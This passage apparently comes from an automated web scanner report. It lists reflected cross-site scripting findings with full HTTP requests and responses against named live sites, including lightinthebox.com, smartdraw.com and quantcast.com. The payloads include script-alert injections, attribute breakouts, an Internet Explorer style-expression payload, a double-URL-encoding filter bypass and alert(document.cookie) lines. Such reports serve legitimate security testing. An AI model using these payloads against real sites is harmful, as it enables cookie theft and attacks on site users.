P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=a7d5c6bff03ec5fc507b206bd2f58b86; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:48 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 21:59:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<!--
indeed_jobroll_format = "160x600";
indeed_jobroll_publisher = "6387719032121626";
indeed_jobroll_keywords = "warehouse openings in westland michigan.html";
indeed_jobroll_location = "all locatione162b";450ee9e1714";
indeed_jobroll_country = "US";
indeed_jobroll_channel = "chanel1";
indeed_color_background = "FFFFFF";
indeed_color_border = "FFFFFF";
//-->
...[SNIP]...

3.115. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 636d6"%20a%3db%201c410831e56 was submitted in the REST URL parameter 3. This input was echoed as 636d6" a=b 1c410831e56 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html636d6"%20a%3db%201c410831e56/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=60ddc87c66256906fadd1f2a484abc98; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 22:00:04 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<meta name="description" content="Find warehouse openings in westland michigan.html636d6" a=b 1c410831e56 jobs and career , displaying 1-15 results. Daily updates Job listing with multiple Rss feed, experience the best way to find a job online" />
...[SNIP]...

3.116. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11311"%3bb0138398545 was submitted in the REST URL parameter 3. This input was echoed as 11311";b0138398545 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html11311"%3bb0138398545/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=7377341cb25663e7e8ec2eb65cf84816; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 22:00:06 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:07 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<!--
indeed_jobroll_format = "160x600";
indeed_jobroll_publisher = "6387719032121626";
indeed_jobroll_keywords = "warehouse openings in westland michigan.html11311";b0138398545";
indeed_jobroll_location = "";
indeed_jobroll_country = "US";
indeed_jobroll_channel = "chanel1";
indeed_color_background = "FFFFFF";
indeed_color_border = "FFFFFF";
//-->
...[SNIP]...

3.117. http://www.kminek.pl/bsdlicense.txt [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /bsdlicense.txt

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73100<script>alert(1)</script>af671aace11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bsdlicense.txt73100<script>alert(1)</script>af671aace11 HTTP/1.1
Host: www.kminek.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:00:42 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=88d2jmcinjb18m98s7vavegus2; path=/
Set-Cookie: layoutbar=deleted; expires=Wed, 03-Feb-2010 22:00:41 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/bsdlicense.txt73100<script>alert(1)</script>af671aace11</strong>
...[SNIP]...

3.118. http://www.kminek.pl/kminek-css-1271705349.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /kminek-css-1271705349.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d399a<script>alert(1)</script>179d88325a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d399a<script>alert(1)</script>179d88325a3 HTTP/1.1
Host: www.kminek.pl
Proxy-Connection: keep-alive
Referer: http://www.kminek.pl/bsdlicense.txt73100%3Cscript%3Ealert(document.cookie)%3C/script%3Eaf671aace11
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=g2rkdjbkf7e1cnmn1jpn3vrc76

Response

HTTP/1.1 404 Not Found
Date: Fri, 04 Feb 2011 01:50:03 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: layoutbar=deleted; expires=Thu, 04-Feb-2010 01:50:02 GMT; path=/
Last-Modified: Fri, 04 Feb 2011 01:50:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8236

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/d399a<script>alert(1)</script>179d88325a3</strong>
...[SNIP]...

3.119. http://www.kminek.pl/kminek-js-1249725108.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /kminek-js-1249725108.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee332<script>alert(1)</script>0b6fe74c897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ee332<script>alert(1)</script>0b6fe74c897 HTTP/1.1
Host: www.kminek.pl
Proxy-Connection: keep-alive
Referer: http://www.kminek.pl/bsdlicense.txt73100%3Cscript%3Ealert(document.cookie)%3C/script%3Eaf671aace11
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=g2rkdjbkf7e1cnmn1jpn3vrc76

Response

HTTP/1.1 404 Not Found
Date: Fri, 04 Feb 2011 01:50:18 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: layoutbar=deleted; expires=Thu, 04-Feb-2010 01:50:17 GMT; path=/
Last-Modified: Fri, 04 Feb 2011 01:50:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8236

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/ee332<script>alert(1)</script>0b6fe74c897</strong>
...[SNIP]...

3.120. http://www.kminek.pl/lab/yetii/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /lab/yetii/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28728<script>alert(1)</script>812ffa424ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lab/yetii28728<script>alert(1)</script>812ffa424ab/ HTTP/1.1
Host: www.kminek.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:02:24 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=spgj6939rjejseveijoefseot5; path=/
Set-Cookie: layoutbar=deleted; expires=Wed, 03-Feb-2010 22:02:23 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:02:24 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8323

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/lab/yetii28728<script>alert(1)</script>812ffa424ab/</strong>
...[SNIP]...

3.121. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e81"><script>alert(1)</script>49b2497dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wholesale-Shower-Faucets_c286390e81"><script>alert(1)</script>49b2497dc HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:02:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:02:05 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJd2b1SLSA0e1Ag==; expires=Fri, 03-Feb-12 22:02:05 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s3; path=/
Content-Length: 94075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...
<a href="/wholesale-Shower-Faucets_c286390e81"><script>alert(1)</script>49b2497dc">
...[SNIP]...

3.122. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c002"><script>alert(1)</script>7f0bb6aab4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wholesale-Shower-Faucets_c2863?8c002"><script>alert(1)</script>7f0bb6aab4f=1 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:01:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:01:52 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJdB3+EjrA6g2Ag==; expires=Fri, 03-Feb-12 22:01:52 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s2; path=/
Cache-control: private
Content-Length: 154339


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...
<a class="sub-menu-icon" href="/wholesale-Shower-Faucets_c2863?8c002"><script>alert(1)</script>7f0bb6aab4f=1#nogo" rel="nofollow" title="">
...[SNIP]...

3.123. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82d7d'%3balert(1)//5681bfb5b3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82d7d';alert(1)//5681bfb5b3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wholesale-Shower-Faucets_c2863?82d7d'%3balert(1)//5681bfb5b3e=1 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:01:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:01:54 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJdKdmyLWA0jaAg==; expires=Fri, 03-Feb-12 22:01:54 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s3; path=/
Cache-control: private
Content-Length: 155234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...
<a class="nowrap tab_USD" href="http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863?82d7d';alert(1)//5681bfb5b3e=1&amp;currency=USD" rel="nofollow" title="US Dollar" target="_top">
...[SNIP]...

3.124. http://www.quantcast.com/p-aasG6JkxVvmNA [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-aasG6JkxVvmNA

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8e5e2<a>074b39b533a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-aasG6JkxVvmNA8e5e2<a>074b39b533a HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Thu, 03 Feb 2011 22:03:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> p-aasG6JkxVvmNA8e5e2<a>074b39b533a</em>
...[SNIP]...

3.125. http://www.quantcast.com/p-aasG6JkxVvmNA [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-aasG6JkxVvmNA

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aabbe"><a>fe7c65bf24b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-aasG6JkxVvmNAaabbe"><a>fe7c65bf24b HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Thu, 03 Feb 2011 22:03:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" p-aasG6JkxVvmNAaabbe"><a>fe7c65bf24b" />
...[SNIP]...

3.126. http://www.smartdraw.com/buy/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3 was submitted in the REST URL parameter 1. This input was echoed as 1d612"style="x:expression(alert(1))"0eedd2683a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:59 GMT
Content-Length: 8711
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0rroqt55mx5ciq55y2wqysn5; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/1d612"style="x:expression(alert(1))"0eedd2683a3/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.127. http://www.smartdraw.com/buy/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e was submitted in the REST URL parameter 1. This input was echoed as f0935"style="x:expression(alert(1))"182a262986e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /buyf0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:55 GMT
Content-Length: 8732
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u5pklnekx3dx2wzgqqztpun5; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buyf0935"style="x:expression(alert(1))"182a262986e/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.128. http://www.smartdraw.com/buy/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 was submitted in the REST URL parameter 2. This input was echoed as 4fed4"style="x:expression(alert(1))"152282d3cc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /buy/4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:10 GMT
Content-Length: 8711
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=nmr5smvrazti5abqjnbbtv45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
